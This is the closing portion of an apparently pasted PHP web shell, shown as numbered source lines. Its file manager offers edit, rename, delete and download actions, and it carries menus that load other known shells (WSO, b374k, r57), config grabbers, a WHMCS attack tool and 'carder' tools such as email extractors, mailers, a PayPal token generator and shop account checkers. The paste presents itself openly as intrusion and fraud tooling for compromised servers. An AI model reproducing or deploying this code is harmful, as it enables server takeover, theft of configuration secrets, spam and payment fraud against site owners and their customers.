src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  4338. echo "<td class='td_home'><center>$ftype</center></td>";
  4339. echo "<td class='td_home'><center>$size</center></td>";
  4340. echo "<td class='td_home'><center>$ftime</center></td>";
  4341. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  4342. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  4343. }
  4344. echo "</tr></table>";
  4345. } else {
  4346. echo "<font color=red>can't open directory</font>";
  4347. }
  4348. }
  4349. echo "<center><hr><form>
  4350. <select onchange='if (this.value) window.open(this.value);'>
  4351. <option selected='selected' value=''> Tools Creator </option>
  4352. <option value='$ling=wso'>WSO 2.8.1</option>
  4353. <option value='$ling=injection'>1n73ction v3</option>
  4354. <option value='$ling=wk'>WHMCS Killer</option>
  4355. <option value='$ling=adminer'>Adminer</option>
  4356. <option value='$ling=b374k'>b374k Shell</option>
  4357. <option value='$ling=scanner'>Scanner Uploader</option>
  4358. <option value='$ling=b374k323'>b374k 3.2</option>
  4359. <option value='$ling=bh'>BlackHat Shell</option>
  4360. <option value='$ling=vhost'>Grab Config Vhost</option>
  4361. <option value='$ling=grabber'>Grab Config</option>
  4362. <option value='$ling=dhanus'>Dhanush Shell</option>
  4363. <option value='$ling=r57'>R57 Shell</option>
  4364. <option value='$ling=encodedecode'>Encode Decode</option>
  4365. </select>
  4366. <select onchange='if (this.value) window.open(this.value);'>
  4367. <option selected='selected' value=''> Tools Carder </option>
  4368. <option value='$ling=extractor'>DB Email Extractor</option>
  4369. <option value='$ling=promailerv2'>Pro Mailer V2</option>
  4370. <option value='$ling=bukalapak'>BukaLapak Checker</option>
  4371. <option value='$ling=tokopedia'>TokoPedia Checker</option>
  4372. <option value='$ling=tokenpp'>Paypal Token Generator</option>
  4373. <option value='$ling=mailer'>Mailer</option>
  4374. <option value='$ling=gamestopceker'>GamesTop Checker</option>
  4375. </select>
  4376. <noscript><input type='submit' value='Submit'></noscript>
  4377. ";
  4378. ?>
  4379. </html>
Add Comment
Please, Sign In to add comment